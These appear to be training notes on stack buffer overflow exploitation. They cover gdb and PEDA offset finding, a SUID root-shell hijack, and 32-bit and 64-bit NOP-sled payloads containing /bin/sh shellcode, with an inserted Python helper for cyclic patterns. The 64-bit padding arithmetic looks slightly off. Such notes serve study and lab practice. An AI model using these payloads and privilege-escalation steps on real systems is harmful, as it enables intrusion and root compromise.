file <program>
ltrace <program>
strings <program>
checksec
sudo apt-get install gdb
ulimit -c unlimited

# If cores aren't being created, use the below as root
echo "core" > /proc/sys/kernel/core_pattern

# Install PEDA
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

# Find program vulnerable to buffer overflow
# Create buffer
python -c 'print "A"*2000' > 2k.txt

# Pipe buffer to program
cat 2k.txt | ./vulnerableprogram

# If it crashes, a core should be dumped

# Analyse core
gdb -q vulnerableprogram ./core
b = breakpoint
c = continue
disas = disassemble
x/s = print the string at an address
x/40wx $esp-0x200 = 40 words, displayed in hex, starting at $esp - 0x200
info functions
info registers
# Open core
gdb -q vulnerableprogram ./core

# View available options
help pattern

# Create pattern with unique strings to find the overflow
pattern create 2000 pattern.txt

# Run pattern without leaving gdb
run < pattern.txt

# Can also do 'pattern_create 2000' which will print to screen
# Can then use 'run "pattern"' to execute

# Will show the memory address that fails (e.g. 0x41426e41 in ??)
# Find offset of that address within gdb
pattern offset 0x<address>

# Quit gdb
quit

# Will give us the byte offset; create an overflow that reaches that address
python -c 'print "A"*<offsetbytes> + "BBBB"' > eip.txt

# Go back into GDB
gdb -q vulnerableprogram ./core

# Run EIP
run < eip.txt

# Should now see all BBBB in EIP, so we can write to the correct location
# Quit GDB
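As an added example (not part of the original notes, nor PEDA's own code), a small Python 3 reimplementation of what `pattern create` / `pattern offset` do, so a crashing register value from a core dump can be mapped back to an input offset offline; the metasploit-style triplet alphabet and the constructed test values are my own choices.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Build a cyclic pattern in the metasploit/PEDA style ("Aa0Aa1Aa2...").

    Every 4-byte window is unique within the first 20280 bytes, so the
    value that lands in EIP/RIP identifies exactly one offset in the input.
    """
    chunks = []
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                chunks.append(u + lo + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("length exceeds the unique range of this alphabet")


def pattern_offset(pattern, value, width=4):
    """Map a crashing register value back to its offset in the pattern.

    `value` is the integer gdb shows (e.g. 0x41426e41) or the raw string of
    bytes. A little-endian machine stores the bytes reversed, so pack()
    restores the order in which they appeared in the input. Returns -1 when
    the value is not part of the pattern (the crash was not controlled by
    this input, or the register holds something else entirely).
    """
    if isinstance(value, int):
        fmt = "<I" if width == 4 else "<Q"   # 4 bytes for EIP, 8 for RIP
        try:
            needle = struct.pack(fmt, value).decode("ascii")
        except (struct.error, UnicodeDecodeError):
            return -1
    else:
        needle = value
    return pattern.find(needle)
```

Feed `pattern_create(2000)` to the program instead of the 2000 "A"s and hand the faulting register value to `pattern_offset`; a result of -1 means the crash did not come from this input.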
# Open new GDB
gdb -q vulnerableprogram

# List functions within gdb
info functions

# Look for non-standard functions
# Analyse them
disas <function>
e.g. disas main

# The instruction directly before the system call pushes a string; analyse the string
# push <address1>
# call <address2> <system@plt>
x/s <address1>
# If the string above is a call to a shell and it's a SUID program,
# then this function can be used for a root shell

# Write the buffer with the address of the start of the function
# This has to be little endian and is the function entry point
# In the below the entry point was 0x080484cb

python -c 'print "A"*<offsetbytes> + "\xcb\x84\x04\x08"' > root.txt

# Launch GDB
gdb -q vulnerableprogram

# Run exploit
run < root.txt

# May see the shell spawn but die instantly. This is due to STDIN closing early.
# Can bypass by piping input to the SUID program like below
(cat root.txt; cat) | ./vulnerableprogram

# This should keep it open
# If dev has been done on a copy in a writeable location, now point to live

(cat root.txt; cat) | /home/xdev/Desktop/vulnerableprogramsuid

# Prove root shell
id
whoami

# Spawn full TTY
python -c 'import pty;pty.spawn("/bin/sh")'
# Run python in GDB
run `python exploit.py`

# The python script has the shellcode (sc), buffers / NOPs etc

sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
payload = "\x90"*50 # NOP sled
payload += sc # Add shellcode
payload += "A"*(390-50-len(sc)) # Fill buffer minus NOPs minus shellcode
payload += "\xe0\xf2\xff\xbf" # EIP = 0xbffff2e0 (little endian), lands in the NOP sled

print payload

# Above spawns a shell (values change obviously)

# EIP might need changing outside of GDB due to environment variable changes.
# If so, run the program like below
./program `python exploit.py`

# Open dump
gdb -q ./program ./core

# Debug
x/40wx $esp-0x200

# Look for the old EIP and check if it's still valid. If not, choose a new one in the NOP sled
# 64-bit: look into the registers more, as the names change
# ESP changes to RSP
# EIP changes to RIP
The code below is a 64-bit example using a stack overflow to call /bin/sh.
from struct import pack

buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xfc\x4e\xe5\x0e\x7e\x6b\xa5"
buf += "\x19\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x96\x75\xbd\x97\x36\xd0\x8a\x7b\x95\x20\xca\x7d\x16"
buf += "\x6b\xf6\x51\x75\xa9\x8d\x23\x1d\x6b\xa5\x51\x75\xa8"
buf += "\xb7\xe6\x76\x6b\xa5\x19\xd3\x2c\x8c\x60\x51\x18\xcd"
buf += "\x19\xaa\x19\xad\x87\x98\x64\xa0\x19"

payload = "\x90"*40 # NOP sled
payload += buf # Shellcode
payload += "A"*(128-len(buf)) # Padding to fill out buffer
payload += pack("<Q", 0x7fffffffe418) # Return address (8 bytes, little endian) pointing into the NOP sled

print payload